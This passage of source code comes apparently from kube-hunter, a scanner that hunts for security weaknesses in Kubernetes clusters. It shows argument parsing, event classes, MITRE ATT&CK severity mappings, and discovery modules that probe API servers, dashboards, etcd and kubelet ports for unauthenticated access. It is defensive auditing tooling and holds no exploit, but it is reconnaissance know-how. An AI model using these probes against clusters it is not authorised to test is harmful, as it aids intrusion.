72 | "By default, when this flag is set, it will use in-cluster config. "
73 | "NOTE: this is automatically switched on in --pod mode.",
74 | )
75 |
76 | parser.add_argument(
77 | "--service-account-token",
78 | type=str,
79 | metavar="JWT_TOKEN",
80 | help="Manually specify the service account jwt token to use for authenticating in the hunting process "
81 | "NOTE: This overrides the loading of the pod's bounded authentication when running in --pod mode",
82 | )
83 |
84 | parser.add_argument(
85 | "--kubeconfig",
86 | type=str,
87 | metavar="KUBECONFIG",
88 | default=None,
89 | help="Specify the kubeconfig file to use for Kubernetes nodes auto discovery "
90 | " (to be used in conjuction with the --k8s-auto-discover-nodes flag.",
91 | )
92 |
93 | parser.add_argument("--active", action="store_true", help="Enables active hunting")
94 |
95 | parser.add_argument(
96 | "--enable-cve-hunting",
97 | action="store_true",
98 | help="Show cluster CVEs based on discovered version (Depending on different vendors, may result in False Positives)",
99 | )
100 |
101 | parser.add_argument(
102 | "--log",
103 | type=str,
104 | metavar="LOGLEVEL",
105 | default="INFO",
106 | help="Set log level, options are: debug, info, warn, none",
107 | )
108 |
109 | parser.add_argument(
110 | "--log-file",
111 | type=str,
112 | default=None,
113 | help="Path to a log file to output all logs to",
114 | )
115 |
116 | parser.add_argument(
117 | "--report",
118 | type=str,
119 | default="plain",
120 | help="Set report type, options are: plain, yaml, json",
121 | )
122 |
123 | parser.add_argument(
124 | "--dispatch",
125 | type=str,
126 | default="stdout",
127 | help="Where to send the report to, options are: "
128 | "stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
129 | "KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
130 | )
131 |
132 | parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")
133 |
134 | parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
135 |
136 | parser.add_argument(
137 | "--num-worker-threads",
138 | type=int,
139 | default=800,
140 | help="In some environments the default thread count (800) can cause the process to crash. "
141 | "In the case of a crash try lowering the thread count",
142 | )
143 |
144 |
145 | def parse_args(add_args_hook):
146 | """
147 | Function handles all argument parsing
148 |
149 | @param add_args_hook: hook for adding arguments to its given ArgumentParser parameter
150 | @return: parsed arguments dict
151 | """
152 | parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
153 | # adding all arguments to the parser
154 | add_args_hook(parser=parser)
155 |
156 | args = parser.parse_args()
157 | if args.cidr:
158 | args.cidr = args.cidr.replace(" ", "").split(",")
159 | return args
160 |
--------------------------------------------------------------------------------
/kube_hunter/core/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import types
3 | from . import events
4 |
--------------------------------------------------------------------------------
/kube_hunter/core/events/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import types
3 |
--------------------------------------------------------------------------------
/kube_hunter/core/events/types.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import threading
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.types import KubernetesCluster
7 | from kube_hunter.core.types.vulnerabilities import (
8 | GeneralSensitiveInformationTechnique,
9 | ExposedSensitiveInterfacesTechnique,
10 | MountServicePrincipalTechnique,
11 | ListK8sSecretsTechnique,
12 | AccessContainerServiceAccountTechnique,
13 | AccessK8sApiServerTechnique,
14 | AccessKubeletAPITechnique,
15 | AccessK8sDashboardTechnique,
16 | InstanceMetadataApiTechnique,
17 | ExecIntoContainerTechnique,
18 | SidecarInjectionTechnique,
19 | NewContainerTechnique,
20 | GeneralPersistenceTechnique,
21 | HostPathMountPrivilegeEscalationTechnique,
22 | PrivilegedContainerTechnique,
23 | ClusterAdminBindingTechnique,
24 | ARPPoisoningTechnique,
25 | CoreDNSPoisoningTechnique,
26 | DataDestructionTechnique,
27 | GeneralDefenseEvasionTechnique,
28 | ConnectFromProxyServerTechnique,
29 | CVERemoteCodeExecutionCategory,
30 | CVEPrivilegeEscalationCategory,
31 | CVEDenialOfServiceTechnique,
32 | )
33 |
34 | logger = logging.getLogger(__name__)
35 |
36 |
37 | class EventFilterBase:
38 | def __init__(self, event):
39 | self.event = event
40 |
41 | # Returns self.event as default.
42 | # If changes has been made, should return the new event that's been altered
43 | # Return None to indicate the event should be discarded
44 | def execute(self):
45 | return self.event
46 |
47 |
48 | class Event:
49 | def __init__(self):
50 | self.previous = None
51 | self.hunter = None
52 |
53 | # newest attribute gets selected first
54 | def __getattr__(self, name):
55 | if name == "previous":
56 | return None
57 | for event in self.history:
58 | if name in event.__dict__:
59 | return event.__dict__[name]
60 |
61 | # Event's logical location to be used mainly for reports.
62 | # If the event doesn't implement it, check the previous event
63 | # This is because events are composed (previous -> previous ...)
64 | # and not inherited
65 | def location(self):
66 | location = None
67 | if self.previous:
68 | location = self.previous.location()
69 |
70 | return location
71 |
72 | # returns the event history ordered from newest to oldest
73 | @property
74 | def history(self):
75 | previous, history = self.previous, list()
76 | while previous:
77 | history.append(previous)
78 | previous = previous.previous
79 | return history
80 |
81 |
82 | class MultipleEventsContainer(Event):
83 | """
84 | This is the class of the object a hunter will get if it was registered to multiple events.
85 | """
86 |
87 | def __init__(self, events):
88 | self.events = events
89 |
90 | def get_by_class(self, event_class):
91 | for event in self.events:
92 | if event.__class__ == event_class:
93 | return event
94 |
95 |
96 | class Service:
97 | def __init__(self, name, path="", secure=True):
98 | self.name = name
99 | self.secure = secure
100 | self.path = path
101 | self.role = "Node"
102 |
103 | # if a service account token was specified, we load it to the Service class
104 | # We load it here because generally all Kubernetes services can be authenticated with the token
105 | config = get_config()
106 | if config.service_account_token:
107 | self.auth_token = config.service_account_token
108 |
109 | def get_name(self):
110 | return self.name
111 |
112 | def get_path(self):
113 | return "/" + self.path if self.path else ""
114 |
115 | def explain(self):
116 | return self.__doc__
117 |
118 |
119 | class Vulnerability:
120 | severity = dict(
121 | {
122 | GeneralSensitiveInformationTechnique: "low",
123 | ExposedSensitiveInterfacesTechnique: "high",
124 | MountServicePrincipalTechnique: "high",
125 | ListK8sSecretsTechnique: "high",
126 | AccessContainerServiceAccountTechnique: "low",
127 | AccessK8sApiServerTechnique: "medium",
128 | AccessKubeletAPITechnique: "medium",
129 | AccessK8sDashboardTechnique: "medium",
130 | InstanceMetadataApiTechnique: "high",
131 | ExecIntoContainerTechnique: "high",
132 | SidecarInjectionTechnique: "high",
133 | NewContainerTechnique: "high",
134 | GeneralPersistenceTechnique: "high",
135 | HostPathMountPrivilegeEscalationTechnique: "high",
136 | PrivilegedContainerTechnique: "high",
137 | ClusterAdminBindingTechnique: "high",
138 | ARPPoisoningTechnique: "medium",
139 | CoreDNSPoisoningTechnique: "high",
140 | DataDestructionTechnique: "high",
141 | GeneralDefenseEvasionTechnique: "high",
142 | ConnectFromProxyServerTechnique: "low",
143 | CVERemoteCodeExecutionCategory: "high",
144 | CVEPrivilegeEscalationCategory: "high",
145 | CVEDenialOfServiceTechnique: "medium",
146 | }
147 | )
148 |
149 | # TODO: make vid mandatory once migration is done
150 | def __init__(self, component, name, category=None, vid="None"):
151 | self.vid = vid
152 | self.component = component
153 | self.category = category
154 | self.name = name
155 | self.evidence = ""
156 | self.role = "Node"
157 |
158 | def get_vid(self):
159 | return self.vid
160 |
161 | def get_category(self):
162 | if self.category:
163 | return self.category.name
164 |
165 | def get_name(self):
166 | return self.name
167 |
168 | def explain(self):
169 | return self.__doc__
170 |
171 | def get_severity(self):
172 | return self.severity.get(self.category, "low")
173 |
174 |
175 | event_id_count_lock = threading.Lock()
176 | event_id_count = 0
177 |
178 |
179 | class NewHostEvent(Event):
180 | def __init__(self, host, cloud=None):
181 | global event_id_count
182 | self.host = host
183 | self.cloud_type = cloud
184 |
185 | with event_id_count_lock:
186 | self.event_id = event_id_count
187 | event_id_count += 1
188 |
189 | @property
190 | def cloud(self):
191 | if not self.cloud_type:
192 | self.cloud_type = self.get_cloud()
193 | return self.cloud_type
194 |
195 | def get_cloud(self):
196 | config = get_config()
197 | try:
198 | logger.debug("Checking whether the cluster is deployed on azure's cloud")
199 | # Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
200 | result = requests.get(
201 | f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
202 | timeout=config.network_timeout,
203 | ).json()
204 | return result["cloud"] or "NoCloud"
205 | except requests.ConnectionError:
206 | logger.info("Failed to connect cloud type service", exc_info=True)
207 | except Exception:
208 | logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
209 | return "NoCloud"
210 |
211 | def __str__(self):
212 | return str(self.host)
213 |
214 | # Event's logical location to be used mainly for reports.
215 | def location(self):
216 | return str(self.host)
217 |
218 |
219 | class OpenPortEvent(Event):
220 | def __init__(self, port):
221 | self.port = port
222 |
223 | def __str__(self):
224 | return str(self.port)
225 |
226 | # Event's logical location to be used mainly for reports.
227 | def location(self):
228 | if self.host:
229 | location = str(self.host) + ":" + str(self.port)
230 | else:
231 | location = str(self.port)
232 | return location
233 |
234 |
235 | class HuntFinished(Event):
236 | pass
237 |
238 |
239 | class HuntStarted(Event):
240 | pass
241 |
242 |
243 | class ReportDispatched(Event):
244 | pass
245 |
246 |
247 | class K8sVersionDisclosure(Vulnerability, Event):
248 | """The kubernetes version could be obtained from the {} endpoint"""
249 |
250 | def __init__(self, version, from_endpoint, extra_info="", category=None):
251 | Vulnerability.__init__(
252 | self,
253 | KubernetesCluster,
254 | "K8s Version Disclosure",
255 | category=ExposedSensitiveInterfacesTechnique,
256 | vid="KHV002",
257 | )
258 | self.version = version
259 | self.from_endpoint = from_endpoint
260 | self.extra_info = extra_info
261 | self.evidence = version
262 | # depending from where the version came from, we might want to also override the category
263 | if category:
264 | self.category = category
265 |
266 | def explain(self):
267 | return self.__doc__.format(self.from_endpoint) + self.extra_info
268 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from .hunters import *
3 | from .components import *
4 | from .vulnerabilities import *
5 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/components.py:
--------------------------------------------------------------------------------
1 | class KubernetesCluster:
2 | """Kubernetes Cluster"""
3 |
4 | name = "Kubernetes Cluster"
5 |
6 |
7 | class KubectlClient:
8 | """The kubectl client binary is used by the user to interact with the cluster"""
9 |
10 | name = "Kubectl Client"
11 |
12 |
13 | class Kubelet(KubernetesCluster):
14 | """The kubelet is the primary "node agent" that runs on each node"""
15 |
16 | name = "Kubelet"
17 |
18 |
19 | class AWS(KubernetesCluster):
20 | """AWS Cluster"""
21 |
22 | name = "AWS"
23 |
24 |
25 | class Azure(KubernetesCluster):
26 | """Azure Cluster"""
27 |
28 | name = "Azure"
29 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/hunters.py:
--------------------------------------------------------------------------------
1 | class HunterBase:
2 | publishedVulnerabilities = 0
3 |
4 | @staticmethod
5 | def parse_docs(docs):
6 | """returns tuple of (name, docs)"""
7 | if not docs:
8 | return __name__, ""
9 | docs = docs.strip().split("\n")
10 | for i, line in enumerate(docs):
11 | docs[i] = line.strip()
12 | return docs[0], " ".join(docs[1:]) if len(docs[1:]) else ""
13 |
14 | @classmethod
15 | def get_name(cls):
16 | name, _ = cls.parse_docs(cls.__doc__)
17 | return name
18 |
19 | def publish_event(self, event):
20 | # Import here to avoid circular import from events package.
21 | # imports are cached in python so this should not affect runtime
22 | from ..events.event_handler import handler # noqa
23 |
24 | handler.publish_event(event, caller=self)
25 |
26 |
27 | class ActiveHunter(HunterBase):
28 | pass
29 |
30 |
31 | class Hunter(HunterBase):
32 | pass
33 |
34 |
35 | class Discovery(HunterBase):
36 | pass
37 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/vulnerabilities.py:
--------------------------------------------------------------------------------
1 | """
2 | Vulnerabilities are divided into 2 main categories.
3 |
4 | MITRE Category
5 | --------------
6 | Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes
7 |
8 | CVE Category
9 | -------------
10 | "General" category definition. The category is usually determined by the severity of the CVE
11 | """
12 |
13 |
14 | class MITRECategory:
15 | @classmethod
16 | def get_name(cls):
17 | """
18 | Returns the full name of the MITRE technique: "<category name> // <technique name>"
19 | Should only be used on a direct technique class at the end of the MITRE inheritance chain.
20 |
21 | Example inheritance:
22 | MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique
23 | """
24 | inheritance_chain = cls.__mro__
25 | if len(inheritance_chain) >= 4:
26 | # -3 == index of the top-level category class (the MRO ends with MITRECategory, object)
27 | mitre_category_class = inheritance_chain[-3]
28 | return f"{mitre_category_class.name} // {cls.name}"
29 |
30 |
31 | class CVECategory:
32 | @classmethod
33 | def get_name(cls):
34 | """
35 | Returns the full name of the category: "CVE // <category name>"
36 | """
37 | return f"CVE // {cls.name}"
38 |
39 |
40 | """
41 | MITRE ATT&CK Technique Categories
42 | """
43 |
44 |
45 | class InitialAccessCategory(MITRECategory):
46 | name = "Initial Access"
47 |
48 |
49 | class ExecutionCategory(MITRECategory):
50 | name = "Execution"
51 |
52 |
53 | class PersistenceCategory(MITRECategory):
54 | name = "Persistence"
55 |
56 |
57 | class PrivilegeEscalationCategory(MITRECategory):
58 | name = "Privilege Escalation"
59 |
60 |
61 | class DefenseEvasionCategory(MITRECategory):
62 | name = "Defense Evasion"
63 |
64 |
65 | class CredentialAccessCategory(MITRECategory):
66 | name = "Credential Access"
67 |
68 |
69 | class DiscoveryCategory(MITRECategory):
70 | name = "Discovery"
71 |
72 |
73 | class LateralMovementCategory(MITRECategory):
74 | name = "Lateral Movement"
75 |
76 |
77 | class CollectionCategory(MITRECategory):
78 | name = "Collection"
79 |
80 |
81 | class ImpactCategory(MITRECategory):
82 | name = "Impact"
83 |
84 |
85 | """
86 | MITRE ATT&CK Techniques
87 | """
88 |
89 |
90 | class GeneralSensitiveInformationTechnique(InitialAccessCategory):
91 | name = "General Sensitive Information"
92 |
93 |
94 | class ExposedSensitiveInterfacesTechnique(InitialAccessCategory):
95 | name = "Exposed sensitive interfaces"
96 |
97 |
98 | class MountServicePrincipalTechnique(CredentialAccessCategory):
99 | name = "Mount service principal"
100 |
101 |
102 | class ListK8sSecretsTechnique(CredentialAccessCategory):
103 | name = "List K8S secrets"
104 |
105 |
106 | class AccessContainerServiceAccountTechnique(CredentialAccessCategory):
107 | name = "Access container service account"
108 |
109 |
110 | class AccessK8sApiServerTechnique(DiscoveryCategory):
111 | name = "Access the K8S API Server"
112 |
113 |
114 | class AccessKubeletAPITechnique(DiscoveryCategory):
115 | name = "Access Kubelet API"
116 |
117 |
118 | class AccessK8sDashboardTechnique(DiscoveryCategory):
119 | name = "Access Kubernetes Dashboard"
120 |
121 |
122 | class InstanceMetadataApiTechnique(DiscoveryCategory):
123 | name = "Instance Metadata API"
124 |
125 |
126 | class ExecIntoContainerTechnique(ExecutionCategory):
127 | name = "Exec into container"
128 |
129 |
130 | class SidecarInjectionTechnique(ExecutionCategory):
131 | name = "Sidecar injection"
132 |
133 |
134 | class NewContainerTechnique(ExecutionCategory):
135 | name = "New container"
136 |
137 |
138 | class GeneralPersistenceTechnique(PersistenceCategory):
139 | name = "General Peristence"
140 |
141 |
142 | class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory):
143 | name = "hostPath mount"
144 |
145 |
146 | class PrivilegedContainerTechnique(PrivilegeEscalationCategory):
147 | name = "Privileged container"
148 |
149 |
150 | class ClusterAdminBindingTechnique(PrivilegeEscalationCategory):
151 | name = "Cluser-admin binding"
152 |
153 |
154 | class ARPPoisoningTechnique(LateralMovementCategory):
155 | name = "ARP poisoning and IP spoofing"
156 |
157 |
158 | class CoreDNSPoisoningTechnique(LateralMovementCategory):
159 | name = "CoreDNS poisoning"
160 |
161 |
162 | class DataDestructionTechnique(ImpactCategory):
163 | name = "Data Destruction"
164 |
165 |
166 | class GeneralDefenseEvasionTechnique(DefenseEvasionCategory):
167 | name = "General Defense Evasion"
168 |
169 |
170 | class ConnectFromProxyServerTechnique(DefenseEvasionCategory):
171 | name = "Connect from Proxy server"
172 |
173 |
174 | """
175 | CVE Categories
176 | """
177 |
178 |
179 | class CVERemoteCodeExecutionCategory(CVECategory):
180 | name = "Remote Code Execution (CVE)"
181 |
182 |
183 | class CVEPrivilegeEscalationCategory(CVECategory):
184 | name = "Privilege Escalation (CVE)"
185 |
186 |
187 | class CVEDenialOfServiceTechnique(CVECategory):
188 | name = "Denial Of Service (CVE)"
189 |
--------------------------------------------------------------------------------
/kube_hunter/modules/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import report
3 | from . import discovery
4 | from . import hunting
5 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import (
3 | apiserver,
4 | dashboard,
5 | etcd,
6 | hosts,
7 | kubectl,
8 | kubelet,
9 | ports,
10 | proxy,
11 | )
12 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/apiserver.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
7 |
8 | from kube_hunter.conf import get_config
9 |
10 | KNOWN_API_PORTS = [443, 6443, 8080]
11 |
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | class K8sApiService(Service, Event):
16 | """A Kubernetes API service"""
17 |
18 | def __init__(self, protocol="https"):
19 | Service.__init__(self, name="Unrecognized K8s API")
20 | self.protocol = protocol
21 |
22 |
23 | class ApiServer(Service, Event):
24 | """The API server is in charge of all operations on the cluster."""
25 |
26 | def __init__(self):
27 | Service.__init__(self, name="API Server")
28 | self.protocol = "https"
29 |
30 |
31 | class MetricsServer(Service, Event):
32 | """The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
33 |
34 | def __init__(self):
35 | Service.__init__(self, name="Metrics Server")
36 | self.protocol = "https"
37 |
38 |
39 | # Other devices could have this port open, but we can check to see if it looks like a Kubernetes api
40 | # A Kubernetes API service will respond with a JSON message that includes a "code" field for the HTTP status code
41 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in KNOWN_API_PORTS)
42 | class ApiServiceDiscovery(Discovery):
43 | """API Service Discovery
44 | Checks for the existence of K8s API Services
45 | """
46 |
47 | def __init__(self, event):
48 | self.event = event
49 | self.session = requests.Session()
50 | self.session.verify = False
51 |
52 | def execute(self):
53 | logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
54 | protocols = ["http", "https"]
55 | for protocol in protocols:
56 | if self.has_api_behaviour(protocol):
57 | self.publish_event(K8sApiService(protocol))
58 |
59 | def has_api_behaviour(self, protocol):
60 | config = get_config()
61 | try:
62 | r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
63 | if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
64 | return True
65 | except requests.exceptions.SSLError:
66 | logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
67 | except Exception:
68 | logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
69 |
70 |
71 | # Acts as a filter for services. If we can classify the API,
72 | # we swap the filtered event with a new corresponding Service event to be published next.
73 | # The classification can depend on the context of the execution.
74 | # Currently we classify: Metrics Server and API Server.
75 | # If running as a pod:
76 | #   We know the API server's IP, so we can classify easily.
77 | # If not:
78 | #   We determine by accessing /version on the service.
79 | #   The API Server's response will contain a major version field, while the Metrics Server's will not.
80 | @handler.subscribe(K8sApiService)
81 | class ApiServiceClassify(EventFilterBase):
82 | """API Service Classifier
83 | Classifies an API service
84 | """
85 |
86 | def __init__(self, event):
87 | self.event = event
88 | self.classified = False
89 | self.session = requests.Session()
90 | self.session.verify = False
91 | # Using the auth token if we can, for the case that authentication is needed for our checks
92 | if self.event.auth_token:
93 | self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
94 |
95 | def classify_using_version_endpoint(self):
96 |         """Tries to classify by accessing /version; returns silently if the endpoint could not be accessed"""
97 | config = get_config()
98 | try:
99 | endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
100 | versions = self.session.get(endpoint, timeout=config.network_timeout).json()
101 | if "major" in versions:
102 | if versions.get("major") == "":
103 | self.event = MetricsServer()
104 | else:
105 | self.event = ApiServer()
106 | except Exception:
107 |             logger.warning("Could not access /version on API service", exc_info=True)
108 |
109 | def execute(self):
110 | discovered_protocol = self.event.protocol
111 | # if running as pod
112 | if self.event.kubeservicehost:
113 | # if the host is the api server's IP, we know it's the Api Server
114 | if self.event.kubeservicehost == str(self.event.host):
115 | self.event = ApiServer()
116 | else:
117 | self.event = MetricsServer()
118 | # if not running as pod.
119 | else:
120 | self.classify_using_version_endpoint()
121 |
122 | # in any case, making sure to link previously discovered protocol
123 | self.event.protocol = discovered_protocol
124 | # If some check classified the Service,
125 | # the event will have been replaced.
126 | return self.event
127 |
--------------------------------------------------------------------------------
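
The probe in has_api_behaviour reduces to a small, self-contained check: the body either mentions "k8s", or the server answers unauthenticated requests with a JSON error envelope that carries a "code" field and a non-200 status. A minimal standalone sketch of the same heuristic; the host and port in the usage line are illustrative assumptions, not values from this repository.

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def looks_like_k8s_api(host, port, protocol="https", timeout=5):
    """Returns True when the endpoint answers like a Kubernetes API server."""
    try:
        r = requests.get(f"{protocol}://{host}:{port}", verify=False, timeout=timeout)
        return "k8s" in r.text or ('"code"' in r.text and r.status_code != 200)
    except requests.RequestException:
        return False


if __name__ == "__main__":
    print(looks_like_k8s_api("10.96.0.1", 443))  # hypothetical in-cluster service IP
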
/kube_hunter/modules/discovery/dashboard.py:
--------------------------------------------------------------------------------
1 | import json
2 | import logging
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Event, OpenPortEvent, Service
8 | from kube_hunter.core.types import Discovery
9 |
10 | logger = logging.getLogger(__name__)
11 |
12 |
13 | class KubeDashboardEvent(Service, Event):
14 |     """A web-based Kubernetes user interface that allows easy operations on the cluster"""
15 |
16 |     def __init__(self, **kwargs):
17 |         Service.__init__(self, name="Kubernetes Dashboard", **kwargs)
18 |
19 |
20 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
21 | class KubeDashboard(Discovery):
22 | """K8s Dashboard Discovery
23 | Checks for the existence of a Dashboard
24 | """
25 |
26 | def __init__(self, event):
27 | self.event = event
28 |
29 | @property
30 | def secure(self):
31 | config = get_config()
32 | endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
33 |         logger.debug("Attempting to access the dashboard API to determine whether it is secured")
34 | try:
35 | r = requests.get(endpoint, timeout=config.network_timeout)
36 | if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
37 | return False
38 | except requests.Timeout:
39 | logger.debug(f"failed getting {endpoint}", exc_info=True)
40 | return True
41 |
42 | def execute(self):
43 | if not self.secure:
44 | self.publish_event(KubeDashboardEvent())
45 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/etcd.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.core.events.event_handler import handler
2 | from kube_hunter.core.events.types import Event, OpenPortEvent, Service
3 | from kube_hunter.core.types import Discovery
4 |
5 |
6 | class EtcdAccessEvent(Service, Event):
7 |     """Etcd is a DB that stores the cluster's data; it contains configuration and current
8 |     state information, and might contain secrets"""
9 |
10 | def __init__(self):
11 | Service.__init__(self, name="Etcd")
12 |
13 |
14 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
15 | class EtcdRemoteAccess(Discovery):
16 |     """Etcd Service Discovery
17 |     Checks for the existence of an etcd service
18 | """
19 |
20 | def __init__(self, event):
21 | self.event = event
22 |
23 | def execute(self):
24 | self.publish_event(EtcdAccessEvent())
25 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/kubectl.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import subprocess
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import HuntStarted, Event
7 |
8 | logger = logging.getLogger(__name__)
9 |
10 |
11 | class KubectlClientEvent(Event):
12 |     """A local kubectl client was discovered on the machine running kube-hunter."""
13 |
14 | def __init__(self, version):
15 | self.version = version
16 |
17 | def location(self):
18 | return "local machine"
19 |
20 |
21 | # Will be triggered on start of every hunt
22 | @handler.subscribe(HuntStarted)
23 | class KubectlClientDiscovery(Discovery):
24 | """Kubectl Client Discovery
25 | Checks for the existence of a local kubectl client
26 | """
27 |
28 | def __init__(self, event):
29 | self.event = event
30 |
31 | def get_kubectl_binary_version(self):
32 | version = None
33 | try:
34 | # kubectl version --client does not make any connection to the cluster/internet whatsoever.
35 |             version_info = subprocess.check_output(["kubectl", "version", "--client"], stderr=subprocess.STDOUT)
36 | if b"GitVersion" in version_info:
37 | # extracting version from kubectl output
38 | version_info = version_info.decode()
39 | start = version_info.find("GitVersion")
40 |                 version = version_info[start + len('GitVersion:"') : version_info.find('",', start)]
41 | except Exception:
42 | logger.debug("Could not find kubectl client")
43 | return version
44 |
45 | def execute(self):
46 | logger.debug("Attempting to discover a local kubectl client")
47 | version = self.get_kubectl_binary_version()
48 | if version:
49 | self.publish_event(KubectlClientEvent(version=version))
50 |
--------------------------------------------------------------------------------
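
The GitVersion extraction above slices on the exact quoting of kubectl's output; an equivalent regex-based extraction is easier to follow and less brittle. A sketch against a representative output line (the sample string is an assumption for illustration; real output varies by kubectl version):

import re

# representative `kubectl version --client` output (assumed for illustration)
sample = 'Client Version: version.Info{Major:"1", Minor:"23", GitVersion:"v1.23.4", ...}'
match = re.search(r'GitVersion:"([^"]+)"', sample)
print(match.group(1) if match else None)  # -> v1.23.4
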
/kube_hunter/modules/discovery/kubelet.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 | import urllib3
4 | from enum import Enum
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.core.types import Discovery
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import OpenPortEvent, Event, Service
10 |
11 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
12 | logger = logging.getLogger(__name__)
13 |
14 | """ Services """
15 |
16 |
17 | class ReadOnlyKubeletEvent(Service, Event):
18 | """The read-only port on the kubelet serves health probing endpoints,
19 | and is relied upon by many kubernetes components"""
20 |
21 | def __init__(self):
22 | Service.__init__(self, name="Kubelet API (readonly)")
23 |
24 |
25 | class SecureKubeletEvent(Service, Event):
26 |     """The Kubelet is the main component in every Node; all pod operations go through the kubelet"""
27 |
28 | def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
29 | self.cert = cert
30 | self.token = token
31 | self.anonymous_auth = anonymous_auth
32 | Service.__init__(self, name="Kubelet API", **kwargs)
33 |
34 |
35 | class KubeletPorts(Enum):
36 | SECURED = 10250
37 | READ_ONLY = 10255
38 |
39 |
40 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
41 | class KubeletDiscovery(Discovery):
42 | """Kubelet Discovery
43 | Checks for the existence of a Kubelet service, and its open ports
44 | """
45 |
46 | def __init__(self, event):
47 | self.event = event
48 |
49 | def get_read_only_access(self):
50 | config = get_config()
51 | endpoint = f"http://{self.event.host}:{self.event.port}/pods"
52 | logger.debug(f"Trying to get kubelet read access at {endpoint}")
53 | r = requests.get(endpoint, timeout=config.network_timeout)
54 | if r.status_code == 200:
55 | self.publish_event(ReadOnlyKubeletEvent())
56 |
57 | def get_secure_access(self):
58 | logger.debug("Attempting to get kubelet secure access")
59 | ping_status = self.ping_kubelet()
60 | if ping_status == 200:
61 | self.publish_event(SecureKubeletEvent(secure=False))
62 | elif ping_status == 403:
63 | self.publish_event(SecureKubeletEvent(secure=True))
64 | elif ping_status == 401:
65 | self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
66 |
67 | def ping_kubelet(self):
68 | config = get_config()
69 | endpoint = f"https://{self.event.host}:{self.event.port}/pods"
70 | logger.debug("Attempting to get pods info from kubelet")
71 | try:
72 | return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
73 | except Exception:
74 | logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
75 |
76 | def execute(self):
77 | if self.event.port == KubeletPorts.SECURED.value:
78 | self.get_secure_access()
79 | elif self.event.port == KubeletPorts.READ_ONLY.value:
80 | self.get_read_only_access()
81 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/kubernetes_client.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import kubernetes
3 |
4 |
5 | def list_all_k8s_cluster_nodes(kube_config=None, client=None):
6 | logger = logging.getLogger(__name__)
7 | try:
8 | if kube_config:
9 | logger.debug("Attempting to use kubeconfig file: %s", kube_config)
10 | kubernetes.config.load_kube_config(config_file=kube_config)
11 | else:
12 | logger.debug("Attempting to use in cluster Kubernetes config")
13 | kubernetes.config.load_incluster_config()
14 | except kubernetes.config.config_exception.ConfigException as ex:
15 | logger.debug(f"Failed to initiate Kubernetes client: {ex}")
16 | return
17 |
18 | try:
19 | if client is None:
20 | client = kubernetes.client.CoreV1Api()
21 | ret = client.list_node(watch=False)
22 |         logger.info("Listed %d nodes in the cluster", len(ret.items))
23 | for item in ret.items:
24 | for addr in item.status.addresses:
25 | yield addr.address
26 | except Exception as ex:
27 | logger.debug(f"Failed to list nodes from Kubernetes: {ex}")
28 |
--------------------------------------------------------------------------------
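
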